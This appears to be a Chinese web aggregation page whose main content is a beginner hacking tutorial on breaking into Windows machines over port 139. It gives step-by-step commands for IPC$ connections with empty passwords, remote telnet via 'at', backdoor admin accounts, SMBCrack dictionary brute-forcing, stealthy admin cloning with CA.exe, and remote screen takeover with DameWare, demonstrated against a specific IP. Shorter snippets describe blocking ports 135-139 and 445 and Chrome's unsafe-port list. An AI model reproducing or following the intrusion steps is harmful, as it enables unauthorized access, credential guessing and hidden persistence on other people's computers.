精华内容
下载资源
问答
  • 如何禁用端口

    2013-03-20 22:08:49
    如何禁用端口,即使你对策略一点不懂也可以按照下面一步一步地完成禁用端口。以139为例(通过139端口入侵是网络攻击中常见的一种攻击手段,一般情况下139端口开启是由于NetBIOS网络协议的使用。
  • 主要介绍了使用BAT命令关闭:135端口、139端口、445端口等,其实就是利用组策略批量添加,需要的朋友可以参考下
  • 139端口入侵

    2015-10-10 20:15:10
    对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部...
    对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵过程和各种命令的运用。现在,let's go。
      <第一部份:知识介绍>
    (1)什么是端口  
       端口是各种程序为了接收和发送数据而开的“窗户”,程序需要它来与外界进行通讯,你可以把它想象成一个邮箱,我要传递消息给你,我就会把消息放到你的邮箱里。你要得到消息,你只需要打开邮箱把消息拿出来。同样,别的计算机为了和你的机器通讯,会把数据发到你的机器的端口上,计算机读取端口就可以得到数据。
      (2)端口是唯一的吗?  
       端口不是唯一的。端口分两种:TCP端口和UDP端口,每种端口最多有65535个,分别用自然数1~65535编号。这里我不解释TCP端口和UDP端口有什么不同,你只须要知道不同的端口对应不同的程序,每个程序只能只能读取发送到属于自己端口上的数据。举个例子,hi.exe打开TCP6500端口,如果我把数据发送到TCP6501端口或是UDP6500端口,hi.exe都接收不到,只有发送到TCP6500端口的数据hi.exe才能接收。
      (3)TCP139端口的作用
       TCP139是用于网络共享的端口,只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中,TCP139端口还有一个重要的作用:远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接,你需要管理员的用户名和密码,这也是基于139端口入侵的重点,只要我们得到了远程计算机的密码,再通过139端口进行IPC$连接,我们就完全控制了远程的计算机。
      (4)必要命令的详解和相关工具的使用
       首先必须说明,为了你能在黑客道路上成长起来,拆了你的Win98,装上Windows2000吧,以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。
       点击开始→运行,输入cmd.exe,跳出一个命令行窗口,你可得熟悉它,因为入侵时95%的工作都是在这里完成的。现在,我来介绍成功进行139入侵的几个必要命令:dir,cd,del,copy,net,at。
       dir的作用是列出指定路径下的目录和文件,输入c:/>dir c:/ 就会列出C盘下的所有目录和文件,dir c:/winnt/ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的,通常某个目录下文件很多,一个屏幕显示不下,我们就会用到/p 如dir c:/ /p。/a是用来显示隐藏的文件、目录的,在Windows里设置一个文件属性为隐藏(假设此文件为c:/a.txt),然后在命令行下输入dir c:/a.txt,你会发现系统告诉你找不到此文件(file not fount),而输入dir c:/a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数,作用是搜索当前驱动器(C盘,D盘……),查找指定文件。比如我要删除对方的主页文件index.asp,但不知到这个文件的位置,我们就可以利用dir index.asp /s在各个分区下进行搜索。
       cd的作用是进入目录,cd c:/winnt/system32 就到了system32目录之中了。不信你可以用dir和dir c:/winnt/system32,得到的结果是一样的,如果你要切换分区,c:/>d: 就到了D盘下了,而不用cd d:,这点要注意。
       del的作用是删除文件,del c:/a.txt 就把a.txt 给删了。
       copy的作用是拷贝文件,这个命令很重要,一定要熟练掌哦。copy c:/a.txt d:/mp3/b.txt 把C盘下的a.txt拷到D盘下的mp3目录下,并重命名为b.txt,注意哦,copy后的文件类型可以是任意的,copy c:/a.exe 就把文件类型改成了可执行文件。当然,a.exe 不会正常运行。
       net 命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
        net use
    net use 命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net use//IP/IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net use 还有一个用处,即映射远程机器的共享资源,输入net use z: //IP/C$ (注意!在此之后的一切命令都是基于第一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样,是不是很有意思呢?
        net view
    net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view //IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E 之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。
        net share
    net share 用于开放共享,输入net share QQ=c:/tencent,你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$ 等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。
        net user
    net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。  
       ┎───────────────────────────────────────────────────────┒ 
       ┃ net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。                      ┃  
       ┃ net user hacker /del 删除名为hacker的用户。                                 ┃ 
       ┃ net user hacker /active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。                 ┃
       ┃ net user hacker /active:yes 激活已禁用的hacker这个用户。                           ┃ 
    ┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃ 
    ┖───────────────────────────────────────────────────────┚ 
    net start / net stop
    net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc (停止网页服务),然后替换网页,对此命令我不多讲,知道即可。
        *at 命令,net time
    之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view //ip,得到远程主机的时间(假设得到的时间为9:00),然后at //ip 9:00 telnet 就启动了telnet服务,at这个命令就是用来远程运行程序的.

      (5)需要准备的工具
       肉鸡猎手v1.0  扫描一个网段,找出弱密码的计算机
       SMBCrack   针对特定主机,暴力猜解密码
       DameWare Mini Remote Control    监控运程屏幕    
       CA.exe 克隆管理员账号

      <第二部份:入侵实例>
    今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:net use //218.80.236.37/IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:net time //218.80.236.37 显示: //218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务,at //218.80.236.37 10:32 telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent 218.80.236.37 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。
      文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下:
      (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用SMBCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入smbcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。
      (2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(clone administrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe //218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。
      (3)at 这个命令有点搞笑,很多人先net view //IP 看了时间后,再用at 来启动对方程序却常常失败,这是因为很多人都不知道,用net view //IP 得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at //IP 15:00 telent。
      好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。
    展开全文
  • Windows禁用445端口

    2017-05-15 10:39:00
    写个脚本,一键执行禁用445,135-139端口。Windows7测试没有问题。 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters" /v SMBDeviceEnabled /t REG_DWORD /d 0 /f net ...

    今天来公司有好多电脑感染了0day病毒,

     

     

    写个脚本,一键执行禁用445,135-139端口。Windows7测试没有问题。

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters" /v SMBDeviceEnabled /t REG_DWORD /d 0 /f
    
    net stop Server /y
    
    sc config "LanmanServer" start= disabled
    
    net start sharedaccess
    net start "Windows Firewall"
    sc config "MpsSvc" start= auto
    
    netsh advfirewall firewall add rule name="deny445" protocol=TCP dir=in localport=445,135-139 action=block
    netsh advfirewall firewall add rule name="deny445udp" protocol=UDP dir=in localport=445,135-139 action=block
    

      

     

    无耻的求一下赞助

    转载于:https://www.cnblogs.com/guoyabin/p/6855346.html

    展开全文
  • session 1 139和445端口的使用背景 SMB(Server Message Block)协议在NT/2000中用来作文件共享,在Win-NT中,SMB运行于NBT(NetBIOS over TCP/IP)上,使用137,139(UDP),139(TCP)端口。 在win2000级以上版本...

    session 1 139和445端口的使用背景
    SMB(Server Message Block)协议在NT/2000中用来作文件共享,在Win-NT中,SMB运行于NBT(NetBIOS over TCP/IP)上,使用137,139(UDP),139(TCP)端口。

    在win2000级以上版本中,SMB可以直接运行在tcp/ip上,而没有额外的NBT层,使用TCP 445端口。

    session 2 两个端口的使用情况
    可以在“网络连接/属性/TCPIP协议/属性/高级/WINS中设置启用或者禁用NBT(NetBIOS over TCP/IP)。
    当计算机同时支持NTB和TCP/IP两种协议的时候,就面临着选择139或者445端口了。下面的情况确定会话使用的端口:
    1、如果客户端启用了NBT,那么连接的时候将同时访问139和445端口,如果从445端口得到回应,那么客户端将发送RST到139端口,终止这个端口的连接,接着就从445端口进行SMB的会话了;如果没有从445端口而是从139得到回应,那么就从139端口进行会话;如果没有得到任何回应,那么SMB会话失败。

    2、如果客户端禁用了NBT,他就将只从445端口进行连接。

    3、如果服务器端启用NBT,那么就同时监听UDP 137、138端口和TCP139,445端口。如果禁用NBT,那么就只监听445端口了。

    总结一下:139端口是在NBT协议基础上的,关闭NBT协议139就废了。而445端口是在TCP/IP协议基础上,现在网络中应该很少有不使用TCP/IP协议的了。最后如果主机两种协议同时支持的话(比如windowsxp以后的操作系统)那么共享访问时候的端口使用优先级为:445>139,所以现在UNC路径访问ip地址都是使用445端口,而访问主机名形式是使用139端口(现在基本不用了)。
    关闭139端口的方法:“网络连接/属性/TCPIP协议/属性/高级/WINS中设置启用或者禁用NBT(NetBIOS over TCP/IP)
    关闭445端口的方法:防火墙阻塞445端口或者禁用server服务都可以。

    展开全文
  • 学习docker做实验的时候,想要删除tomcat的docs目录让其访问404后生成镜像, ...用谷歌浏览器访问10.0.0.81:6666的时候提示ERR_UNSAFE_PORT,才知道谷歌禁用了部分端口 1, // tcpmux 7, // echo 9, //

    学习docker做实验的时候,想要删除tomcat的docs目录让其访问404后生成镜像,

    docker commit -a="pzy" -m "tomcat without docs" f69985eabff7 pzy/mytomcat:1.0
    docker run -it -p 6666:8080 pzy/mytomcat:1.0
    

    用谷歌浏览器访问10.0.0.81:6666的时候提示ERR_UNSAFE_PORT,才知道谷歌禁用了部分端口
    1, // tcpmux

    7, // echo

    9, // discard

    11, // systat

    13, // daytime

    15, // netstat

    17, // qotd

    19, // chargen

    20, // ftp data

    21, // ftp access

    22, // ssh

    23, // telnet

    25, // smtp

    37, // time

    42, // name

    43, // nicname

    53, // domain

    77, // priv-rjs

    79, // finger

    87, // ttylink

    95, // supdup

    101, // hostriame

    102, // iso-tsap

    103, // gppitnp

    104, // acr-nema

    109, // pop2

    110, // pop3

    111, // sunrpc

    113, // auth

    115, // sftp

    117, // uucp-path

    119, // nntp

    123, // NTP

    135, // loc-srv /epmap

    139, // netbios

    143, // imap2

    179, // BGP

    389, // ldap

    465, // smtp+ssl

    512, // print / exec

    513, // login

    514, // shell

    515, // printer

    526, // tempo

    530, // courier

    531, // chat

    532, // netnews

    540, // uucp

    556, // remotefs

    563, // nntp+ssl

    587, // stmp?

    601, // ??

    636, // ldap+ssl

    993, // ldap+ssl

    995, // pop3+ssl

    2049, // nfs

    3659, // apple-sasl / PasswordServer

    4045, // lockd

    6000, // X11

    6665, // Alternate IRC [Apple addition]

    6666, // Alternate IRC [Apple addition]

    6667, // Standard IRC [Apple addition]

    6668, // Alternate IRC [Apple addition]

    6669, // Alternate IRC [Apple addition]

    想要解决的话可以在谷歌快捷方式的目标里加上–explicitly-allowed-ports=6666
    完整路径如下,根据个人安装位置有所不同
    “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” --explicitly-allowed-ports=6666
    在这里插入图片描述
    ps:如果此时谷歌开着的时候,更改完目标路径后,记得关闭浏览器重新开启,否则采用的是较早前的目标开启,还是不能访问6666端口
    在这里插入图片描述
    在这里插入图片描述
    IE没有禁用6666端口,但是如果用edge浏览器也是禁用了6666端口的(亲测)
    IE
    在这里插入图片描述
    edge
    在这里插入图片描述

    展开全文
  • 139端口的入侵

    千次阅读 2016-01-20 16:06:46
    对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部...
  • 如何关闭135端口、139端口、445端口

    万次阅读 2012-02-08 11:19:13
    都知道135端口,139端口以及445端口.这三个端口容易被黑客或者病毒利用.所以我们今天就来教下大家如何关闭它. 太难的方法就不教给大家了.什么实用策略组之类的.新手感觉很麻烦.所以下面给大家来简单的教程 方法一...
  • 如何关闭139端口、445端口等

    千次阅读 2008-07-07 10:28:00
    关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。 (2)防止rpc漏洞 ...
  • 端口关闭方法及端口查看方法 1 右键单击桌面右下角本地连接属性见下图 2 在弹出的对话框中点击属性见下图 3 在弹出的菜单中选择 TCP/IP并点击属性见下图 4 在弹出的对话框中选择高级见下图 5 在弹出的对话框中选择 ...
  • windows的139端口和445端口的区别

    万次阅读 2016-07-07 10:57:03
    session 1 139和445端口的使用背景 SMB(Server Message Block)协议在NT/2000中用来作文件共享,在Win-NT中,SMB运行于NBT(NetBIOS over TCP/IP)上,使用137,139(UDP),139(TCP)端口。  在win2000级...
  • windows服务器禁用135,137,138,139,445端口方法 1.防火墙新建入站和出站规则 注意:此方法只针对防火墙已开启的情况下才能实现禁用端口 打开控制面板\系统和安全\Windows Defender 防火墙,在左侧选择“高级设置”...
  • 入侵139端口实例

    千次阅读 2019-06-24 13:48:10
    今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入...相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。    
  • 谷歌浏览器禁用端口号: 1, // tcpmux 7, // echo 9, // discard 11, // systat 13, // daytime 15, // netstat 17, // qotd 19, // chargen 20, // ftp data 21, // ftp access 22, // ssh 23, // ...
  • 引用139端口入侵

    2010-10-11 20:23:00
    满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵...
  • 139端口 这个端口比较危险 139端口是NetBIOS Session端口,用来文件和打印共享 如果你是单机,不是企业内部网里的成员,为了保护计算机的安全关闭这个端口比较好。 下面是步骤 1 开始键 输入 控制面板 点击进入...
  • 勒索病毒,华为/H3C三层交换机/路由器用ACL端口禁用高危端口 **************************************华为 #aclnumber 3100 //创建ALC控制规则 rule 5 deny tcp destination-port eq 445 //禁止TCP 445端口数据 ...
  • 139端口 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。 IPC$通信 Windows系统中的net use ipc整个通信过程,先445−>137−...
  • 关闭WINDOWS服务器的135、137、139、445端口能有效防范勒索病毒,当然同时也阻止了很多WINDOWS的服务和通讯,应该慎用,测试好业务再实践 操作系统平台:WINDOWS2008,WINDOWS2012 1、打开组策略CMD运行GPEDIT.MSC,...
  • 转载地址:https://jingyan.baidu.com/article/d621e8da0abd192865913f1f.html?qq-pf-to=pcqq.group 处理最近出现在高校系统入侵的病毒
  • windows禁用端口

    千次阅读 2009-08-04 13:27:00
    以139为例: 1.开始->控制面板(或者管理)->管理工具->本地安全策略2.右击"Ip安全策略,在 本地...在⑴ 名称(N) 下面添上"禁止139端口" 描述(D) 也写上"禁止139端口" ⑵添加按扭 ⑶惦记下一步 ⑷在源地址(s):
  • 139端口的攻与防

    2006-08-08 14:06:00
    通过139端口入侵是网络攻击中常见的一种攻击手段,一般情况下139端口开启是由于NetBIOS网络协议的使用。NetBIOS即网络基本输入输出系统,系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP...
  • 139端口的攻与防(2)

    2005-12-29 11:01:00
    防范139攻击 对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。 针对使用Windows 9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录...
  • 2019独角兽企业重金招聘Python工程师标准>>> 找到网络连接,查看属性, ...139端口是微软的软件的漏洞,建议关闭 转载于:https://my.oschina.net/u/1461902/blog/354106

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 8,594
精华内容 3,437
关键字:

如何禁用139端口